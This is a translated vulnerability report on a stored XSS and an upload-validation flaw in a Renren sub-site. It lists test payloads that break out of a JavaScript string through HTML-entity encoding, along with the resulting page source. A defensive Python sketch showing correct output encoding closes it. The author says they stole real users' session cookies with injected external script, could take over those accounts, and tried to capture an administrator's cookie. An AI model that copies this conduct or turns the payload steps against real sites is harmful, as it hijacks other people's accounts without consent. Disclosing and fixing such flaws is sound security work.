Renren.com sub-station stored XSS vulnerability and upload problems

Source: Internet
Author: User

In the evening I was poking around Renren and found that one of its sub-stations has a stored XSS. It could be used to blindly hit the management backend or to steal other users' login cookies (verified). The upload function also has some problems. This is only a preliminary test; please check it carefully, and please do not give it a single-digit rank.

1. The affected sub-station: http://mentos.renren.com/

2. Upload a file and notice that the characters in the title field are output inside JavaScript. So construct an XSS test string. XSS code:
       ', (function () {alert (1)} (), '
   Looking at the source with F12, the ' is filtered. Source code:
       <a href="javascript:void(0)" onclick="all_video_play (324,'', (function () {alert (1)} (), '', 0, '123 ', 'http://v139.56img.com/images/28/5/coop_3000002383i56olo56i56.com_cw_137535892041hd.jpg', 'U')"></a>

3. Change the ' to its HTML entity encoding &#39; and submit again. XSS code:
       &#39;, (function () {alert (1)} (), &#39;
   Looking again with F12, the source code now reads:
       <a href="javascript:void(0)" onclick="all_video_play (325,'', (function () {alert (1 )}()), '', 0, 'http://yx.xnimg.cn/M04/22/1308/71/YJjIVnQrU36jai2aimQb63yi.ori.mp3', 'http://yx.xnimg.cn/M04/62/41/41/ZrIJ3yZrmE3ejaINBjAFvmYz.ori.jpg', 'M')"></a>

4. Click it and try again.

5. Try writing " > < in the same HTML entity (&#...) form, and find that these three characters are filtered twice, ending up as &quot; &gt; &lt; in the page. Source code:
       <a href="javascript:void(0)" onclick="all_video_play (326,'')&quot;&gt;&lt;img src = 1 onerror = alert (22)&gt;', 0, 'http://yx.xnimg.cn/M02/22/1308/79/Zzq6vyB7Rz2uUNN3Yf6RvuAr.ori.mp3', 'http://yx.xnimg.cn/M04/62/78/78/ym2emmbEB7niZNBnMbuyYfa2.ori.jpg', 'M')"></a>

6. Test whether there are other restrictions: can code that loads an external JS file be inserted? The result: no trouble at all.

7. So one can write code that steals users' login cookies. Although this is a click-triggered XSS, the hit rate still seems fairly high, probably because people click to play the video or audio. Within a short time I received several, from different addresses. I am not clear which channels they came in through.

8. With them one can log in to another user's account and perform any operation at will (rest assured that I did not publish or do anything with the users' accounts).

The administrator either had left work or was being careful: after waiting half an hour, no administrator cookie had been obtained. Perhaps because I put an alert(1) in front and he noticed it. However, based on my previous experience with XSS across the internet, the management backend most likely has no second round of XSS filtering. I will not wait here for the administrator's cookie to log in to the backend; there is probably nothing much in it anyway.

9. There are also problems with uploading: illegal files can be uploaded at both the image location and the video location. I wrote a TXT file, changed its suffix to xx.jpg, and it was accepted directly.

Solution:
1. Filtering.
2. Check what is uploaded at the upload locations.
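To show why the entity form in step 3 slipped past a filter that caught the literal quote in step 2, and what "filtering" needs to mean for this context, here is an added Python example (not the report's code and not Renren's): it models the observed filter as an assumption (literal ' neutralised, entities passed through), simulates the browser decoding the onclick attribute before the JS engine tokenises it, and contrasts that with JSON-encoding the title for JavaScript and then entity-encoding it for the attribute. The all_video_play template tail and the u.mp3/u.jpg values are constructed stand-ins.

```python
import html
import json

# Constructed test titles after the report: the plain-quote payload and
# the same payload with ' written as the HTML entity &#39; .
PLAIN_TITLE = "', (function () {alert (1)} (), '"
ENTITY_TITLE = "&#39;, (function () {alert (1)} (), &#39;"

# Template tail after the title argument, modelled on the page's markup.
TAIL = ",'',0,'u.mp3','u.jpg','M')"

def flawed_literal(title: str) -> str:
    """Assumed model of the site's filter: a literal ' is backslash-
    escaped, but entity forms such as &#39; pass through untouched."""
    return "'" + title.replace("'", "\\'") + "'"

def hardened_literal(title: str) -> str:
    """Encode for the real context, a JS string inside an HTML attribute:
    JSON-encode for JavaScript, then entity-encode for the attribute."""
    return html.escape(json.dumps(title), quote=True)

def split_first_string_literal(js: str):
    """Tokenise like a JS engine: return (body, rest) for the first string
    literal, which ends at the first unescaped copy of its opening quote."""
    start = min(i for i, c in enumerate(js) if c in "'\"")
    quote, body, i = js[start], [], start + 1
    while i < len(js):
        c = js[i]
        if c == "\\":            # backslash escape: take next char literally
            body.append(js[i + 1])
            i += 2
            continue
        if c == quote:
            return "".join(body), js[i + 1:]
        body.append(c)
        i += 1
    raise ValueError("unterminated string literal")

def title_confined(title: str, make_literal) -> bool:
    """True when the title stays inside one JS string literal after the
    browser decodes the onclick attribute (which happens before JS runs)."""
    attr_value = f"all_video_play(325,{make_literal(title)}{TAIL}"
    js_seen_by_engine = html.unescape(attr_value)   # attribute decoding step
    rest = split_first_string_literal(js_seen_by_engine)[1]
    return rest == TAIL
```

With the flawed filter the entity payload decodes to a bare quote and the literal closes early, exactly as in step 3; with the JSON-plus-entity encoding both payloads, and a double-quote variant, stay inside the string.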
